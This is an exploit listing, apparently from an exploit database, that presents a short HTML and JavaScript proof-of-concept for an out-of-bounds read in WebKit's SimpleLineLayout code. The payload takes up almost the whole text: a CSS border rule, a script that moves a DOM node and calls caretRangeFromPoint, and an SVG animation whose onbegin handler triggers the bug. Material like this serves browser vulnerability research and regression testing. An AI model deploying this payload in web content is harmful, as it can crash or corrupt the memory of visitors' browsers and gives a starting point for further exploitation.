Exploit for WebKit: out-of-bounds read in WebCore::SimpleLineLayout::RunResolver::runForPoint
Exploit Code
## https://sploitus.com/exploit?id=SSV:96888
<style>
* { border-bottom: green solid; margin: 0px; }
</style>
<script>
function eventhandler() {
dd.before(a);
document.caretRangeFromPoint(0,0);
}
</script>
<h6>
<a id="a"></a>
</h6>
<dd id="dd"></dd>
<svg>
<set attributeName="dominant-baseline" onbegin="eventhandler()" />